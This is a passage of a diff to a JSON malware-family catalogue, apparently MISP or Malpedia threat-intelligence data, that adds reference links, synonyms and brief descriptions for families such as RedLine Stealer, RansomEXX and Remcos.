- "https://securitykitten.github.io/2017/02/15/the-rambo-backdoor.html" + "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", + "https://securitykitten.github.io/2017/02/15/the-rambo-backdoor.html", + "https://github.com/m0n0ph1/APT_CyberCriminal_Campagin_Collections-1/blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor/Deep%20Dive%20on%20the%20DragonOK%20Rambo%20Backdoor%20_%20Morphick%20Cyber%20Security.pdf" ], "synonyms": [ "brebsd" @@ -13963,12 +25566,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit", - "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", - "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html", + "https://blogs.akamai.com/2019/02/ramnit-in-the-uk.html", + "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", + "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", + "https://www.youtube.com/watch?v=N4f2e8Mygag", "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/", + "https://redcanary.com/resources/webinars/deep-dive-process-injection/", + "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", "https://research.checkpoint.com/ramnits-network-proxy-servers/", "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html", + "https://www.youtube.com/watch?v=l6ZunH6YG0A", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf" ], "synonyms": [ @@ -13979,11 +25590,29 @@ "uuid": "542161c0-47a4-4297-baca-5ed98386d228", "value": "Ramnit" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramsay", + "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/", + "https://www.antiy.cn/research/notice&report/research_report/20200522.html", + "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", + "https://www.youtube.com/watch?v=SKIu4LqMrns", + "https://www.sentinelone.com/blog/why-on-device-detection-matters-new-ramsay-trojan-targets-air-gapped-networks/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3b5bb37b-c5be-45b6-a4b1-83a03605a926", + "value": "Ramsay" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus", + "https://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf", "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/", "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/", "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html", @@ -14021,6 +25650,37 @@ "uuid": "5310903e-0704-4ca4-ab1b-52d243dddb06", "value": "Ransoc" }, + { + "description": "RansomExx is a ransomware family that targeted multiple companies starting in mid-2020. It shares commonalities with Defray777.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx", + "https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3", + "https://www.bleepingcomputer.com/news/security/new-ransom-x-ransomware-used-in-texas-txdot-cyberattack/", + "https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/", + "https://github.com/Bleeping/Ransom.exx", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/" + ], + "synonyms": [ + "Defray777", + "Ransom X" + ], + "type": [] + }, + "uuid": "ddb31693-2356-4345-9c0f-ab37724090a4", + "value": "RansomEXX (Windows)" + }, { "description": "", "meta": { @@ -14037,13 +25697,29 @@ "uuid": "3e47c926-eea3-4fba-915a-1f3c5b92a94c", "value": "Ransomlock" }, + { + "description": "Ransomware SNC is a ransomware who encrypts files and asks for a variable amount of Bitcoin before releasing the decryption key to your files. The threat actor asks to be contacted for negotiating the right ransom fee.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomware_snc", + "https://yomi.yoroi.company/report/5deea91bac2ea1dcf5337ad8/5deead588a4518a7074dc6e6/overview" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0e9c2936-7167-48fb-9dee-a83f83d8e41e", + "value": "Ransomware SNC" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom", "https://twitter.com/malwrhunterteam/status/997748495888076800", - "https://twitter.com/malwrhunterteam/status/977275481765613569" + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://twitter.com/malwrhunterteam/status/977275481765613569", + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://exchange.xforce.ibmcloud.com/collection/GuessWho-Ransomware-A-Variant-of-Rapid-Ransomware-ef226b9792fa4c1e34fa4c587db04145" ], "synonyms": [], "type": [] @@ -14091,25 +25767,66 @@ "uuid": "e0a1407f-2595-4bd2-ba16-2c6d9be4e066", "value": "rarstar" }, + { + "description": "This is a backdoor that establishes persistence using the Startup folder. \r\nIt communicates to its C&C server using HTTPS and a static HTTP User-Agent \r\nstring. QUICKRIDE is capable of gathering information about the system, \r\ndownloading and loading executables, and uninstalling itself. It was leveraged \r\nagainst banks in Poland.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankba", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.secureworks.com/research/threat-profiles/nickel-gladstone", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", + "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html", + "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware-0", + "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html", + "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/", + "https://twitter.com/PhysicalDrive0/status/828915536268492800", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware" + ], + "synonyms": [ + "QUICKRIDE" + ], + "type": [] + }, + "uuid": "eead20f5-6a30-4700-8d14-cfb2d42eaff0", + "value": "Ratankba" + }, { "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratabankapos", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankbapos", "http://blog.trex.re.kr/3", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" ], + "synonyms": [ + "RATANKBAPOS" + ], + "type": [] + }, + "uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d", + "value": "RatankbaPOS" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratsnif", + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", + "https://threatvector.cylance.com/en_us/home/threat-spotlight-ratsnif-new-network-vermin-from-oceanlotus.html" + ], "synonyms": [], "type": [] }, - "uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d", - "value": "RatabankaPOS" + "uuid": "2f700b52-4379-4b53-894b-1823e34ae71d", + "value": "RatSnif" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos", + "https://www.youtube.com/watch?v=fevGZs0EQu8", "https://threatvector.cylance.com/en_us/home/rawpos-malware.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite" ], @@ -14119,13 +25836,32 @@ "uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7", "value": "RawPOS" }, + { + "description": "A family identified by ESET Research in the InvisiMole campaign.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rc2fm", + "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "165f385f-8507-4cd3-9afd-911a016b2d29", + "value": "RC2FM" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs", - "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-hacking-team-hacked-team/", "https://www.f-secure.com/documents/996508/1030745/callisto-group", + "https://www.vice.com/en_us/article/jgxvdx/jan-marsalek-wirecard-bizarre-attempt-to-buy-hacking-team-spyware", + "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", + "http://blogs.360.cn/post/APT-C-34_Golden_Falcon.html", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", + "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", + "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-hacking-team-hacked-team/", + "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/" ], "synonyms": [ @@ -14137,6 +25873,19 @@ "uuid": "c359c74e-4155-4e66-a344-b56947f75119", "value": "RCS" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rctrl", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "40eff712-4812-4b8a-872d-7c9f4b7a8d72", + "value": "RCtrl" + }, { "description": "", "meta": { @@ -14150,6 +25899,22 @@ "uuid": "1bf3469a-b9c8-497a-bcbb-b1095386706a", "value": "rdasrv" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdat", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf", + "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/" + ], + "synonyms": [ + "GREYSTUFF" + ], + "type": [] + }, + "uuid": "69798a1e-1caf-4bc8-b4af-6508d8a26717", + "value": "RDAT" + }, { "description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot.", "meta": { @@ -14171,7 +25936,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver", - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/", + "https://threatvector.cylance.com/en_us/home/reaver-mapping-connections-between-disparate-chinese-apt-groups.html" ], "synonyms": [], "type": [] @@ -14196,33 +25962,113 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.redaman", - "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", + "http://blog.macnica.net/blog/2017/12/post-8c22.html", + "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "https://www.carbonblack.com/2017/05/09/carbon-black-threat-research-dissects-red-leaves-malware-leverages-dll-side-loading/", + "https://community.rsa.com/community/products/netwitness/blog/2017/05/03/hunting-pack-use-case-redleaves-malware", + "http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf", + "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves", + "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.jpcert.or.jp/magazine/acreport-redleaves.html", + "https://www.us-cert.gov/ncas/alerts/TA17-117A" + ], + "synonyms": [ + "BUGJUICE" + ], + "type": [] + }, + "uuid": "a70e93a7-3578-47e1-9926-0818979ed866", + "value": "RedLeaves" + }, + { + "description": "Redline Stealer is a malware available on underground forums for sale apparently as standalone versions or also on a subscription basis. This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of Redliune added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer", + "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns", + "https://www.bleepingcomputer.com/news/security/redline-info-stealing-malware-spread-by-folding-home-phishing/", + "https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign", + "https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack" ], "synonyms": [], "type": [] }, - "uuid": "97dab1f9-724a-4560-9c70-90c0d1d7fa4b", - "value": "Redaman" + "uuid": "ff18a858-7778-485c-949b-d28d867d1ffb", + "value": "RedLine Stealer" }, { "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves", - "http://blog.macnica.net/blog/2017/12/post-8c22.html", - "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", - "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf", - "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves", - "https://www.jpcert.or.jp/magazine/acreport-redleaves.html" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redpepper", + "https://twitter.com/ItsReallyNick/status/1136502701301346305" + ], + "synonyms": [ + "Adupib" + ], + "type": [] + }, + "uuid": "42fc1cf4-23ee-47a6-bdd3-7dc824948ba7", + "value": "REDPEPPER" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redrum", + "https://id-ransomware.blogspot.com/2019/12/redrum-ransomware.html" + ], + "synonyms": [ + "Grinch", + "Thanos", + "Tycoon" + ], + "type": [] + }, + "uuid": "cbb4cfd8-3642-4b04-a199-8e9b4b80fb62", + "value": "RedRum Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redsalt", + "https://twitter.com/ItsReallyNick/status/1136502701301346305", + "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s01-hunting-for-platinum.pdf" + ], + "synonyms": [ + "Dipsind" + ], + "type": [] + }, + "uuid": "da2210c7-c953-4367-9f4b-778e77af7ce7", + "value": "REDSALT" + }, + { + "description": "REDSHAWL is a session hijacking utility that starts a new process as another user currently logged on to the same system via command-line.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redshawl", + "https://content.fireeye.com/apt/rpt-apt38", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf" ], "synonyms": [], "type": [] }, - "uuid": "a70e93a7-3578-47e1-9926-0818979ed866", - "value": "RedLeaves" + "uuid": "799cce43-6ba0-4e21-9a63-f8b7f9bb7cc4", + "value": "REDSHAWL" }, { "description": "", @@ -14278,11 +26124,16 @@ "value": "reGeorg" }, { - "description": "", + "description": "Regin is a sophisticated malware and hacking toolkit attributed to United States' National Security Agency (NSA) for government spying operations. It was first publicly revealed by Kaspersky Lab, Symantec, and The Intercept in November 2014. Regin malware targeted victims in a range of industries, telecom, government, and financial institutions. It was engineered to be modular and over time dozens of modules have been found and attributed to this family. Symantec observed around 100 infections in 10 different countries across a variety of organisations including private companies, government entities, and research institutes.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin", - "https://www.youtube.com/watch?v=jeLd-gw2bWo" + "https://www.youtube.com/watch?v=jeLd-gw2bWo", + "https://www.epicturla.com/previous-works/hitb2020-voltron-sta", + "https://www.kaspersky.com/blog/regin-apt-most-sophisticated/6852/", + "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/regin-top-tier-espionage-tool-15-en.pdf" ], "synonyms": [], "type": [] @@ -14294,20 +26145,117 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos", - "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "http://malware-traffic-analysis.net/2017/12/22/index.html", - "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", - "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", - "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", - "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html", - "https://secrary.com/ReversingMalware/RemcosRAT/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.regretlocker", + "http://chuongdong.com/reverse%20engineering/2020/11/17/RegretLocker/", + "https://www.bleepingcomputer.com/news/security/new-regretlocker-ransomware-targets-windows-virtual-machines/", + "https://twitter.com/malwrhunterteam/status/1321375502179905536" ], "synonyms": [], "type": [] }, + "uuid": "f89df0d5-2d01-49a2-a2d0-71cdc6a9d64e", + "value": "RegretLocker" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rekensom", + "https://id-ransomware.blogspot.com/2020/03/rekensom-ransomware.html" + ], + "synonyms": [ + "GHack Ransomware" + ], + "type": [] + }, + "uuid": "b59a97df-04c5-4e54-a7aa-92452baa7240", + "value": "RekenSom Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rektloader", + "https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "431808a0-3671-4072-a9af-9947a54b4b9d", + "value": "Rekt Loader" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rektware", + "https://id-ransomware.blogspot.com/2018/09/rektware-ransomware.html" + ], + "synonyms": [ + "PRZT Ransomware" + ], + "type": [] + }, + "uuid": "b40a66c6-c8fa-43c3-8084-87e90f00a8f1", + "value": "Rektware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcom", + "https://doublepulsar.com/second-zerologon-attacker-seen-exploiting-internet-honeypot-c7fb074451ef" + ], + "synonyms": [ + "RemoteCommandExecution" + ], + "type": [] + }, + "uuid": "135ce3db-a242-4f81-844a-cf03eb72c291", + "value": "RemCom" + }, + { + "description": "Remcos (acronym of Remote Control & Surveillance Software) is a Remote Access Software used to remotely control computers.\r\nRemcos, once installed, opens a backdoor on the computer, granting full access to the remote user. \r\nRemcos can be used for surveillance and penetration testing purposes, and in some instances has been used in hacking campaigns. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos", + "https://dissectingmalwa.re/malicious-ratatouille.html", + "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", + "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", + "https://github.com/1d8/analyses/blob/master/RemcosDocDropper.MD", + "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html", + "https://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html", + "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html", + "https://secrary.com/ReversingMalware/RemcosRAT/", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html", + "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", + "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", + "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "http://malware-traffic-analysis.net/2017/12/22/index.html", + "https://blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", + "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://www.bitdefender.com/files/News/CaseStudies/study/390/Bitdefender-PR-Whitepaper-Remcos-creat5080-en-EN-GenericUse.pdf", + "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://www.vmray.com/cyber-security-blog/smart-memory-dumping/", + "https://www.youtube.com/watch?v=DIH4SvKuktM" + ], + "synonyms": [ + "RemcosRAT", + "Remvio", + "Socmer" + ], + "type": [] + }, "uuid": "2894aee2-e0ec-417a-811e-74a68ab967b2", "value": "Remcos" }, @@ -14316,22 +26264,61 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi", - "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", + "https://www.secureworks.com/research/threat-profiles/cobalt-hickman", + "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf", + "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf", - "https://securelist.com/chafer-used-remexi-malware/89538/" + "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", + "https://securelist.com/chafer-used-remexi-malware/89538/", + "https://twitter.com/QW5kcmV3/status/1095833216605401088" + ], + "synonyms": [ + "CACHEMONEY" ], - "synonyms": [], "type": [] }, "uuid": "d39486af-c056-4bbf-aa1d-86fb5ef90ada", "value": "Remexi" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.remoteadmin", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=hacktool:win32/remoteadmin&ThreatID=2147731874" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6730a859-f2b9-48f9-8d2b-22944a79c072", + "value": "RemoteAdmin" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.remotecontrolclient", + "https://github.com/frozleaf/RemoteControl" + ], + "synonyms": [ + "remotecontrolclient" + ], + "type": [] + }, + "uuid": "44aae79d-c2f5-47f6-99c1-540c0c5420db", + "value": "RemoteControl" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf" + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-2.html", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf", + "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-3.html", + "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis.html" ], "synonyms": [], "type": [] @@ -14344,9 +26331,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy", - "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html" + "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html", + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn" + ], + "synonyms": [ + "WINDSHIELD" ], - "synonyms": [], "type": [] }, "uuid": "b2b93651-cf64-47f5-a54f-799b919c592c", @@ -14370,7 +26360,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup", - "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/" + "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/", + "https://decoded.avast.io/janvojtesek/putting-an-end-to-retadup-a-malicious-worm-that-infected-hundreds-of-thousands/" ], "synonyms": [], "type": [] @@ -14383,12 +26374,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe", + "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe", "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/", "https://github.com/cocaman/retefe", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "https://www.govcert.admin.ch/blog/35/reversing-retefe", "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/", - "https://github.com/Tomasuh/retefe-unpacker" + "https://github.com/Tomasuh/retefe-unpacker", + "https://vulnerability.ch/2019/05/analysing-retefe-with-sysmon-and-splunk/" ], "synonyms": [ "Tsukuba", @@ -14399,14 +26392,38 @@ "uuid": "96bf1b6d-28e1-4dd9-aabe-23050138bc39", "value": "Retefe (Windows)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.retro", + 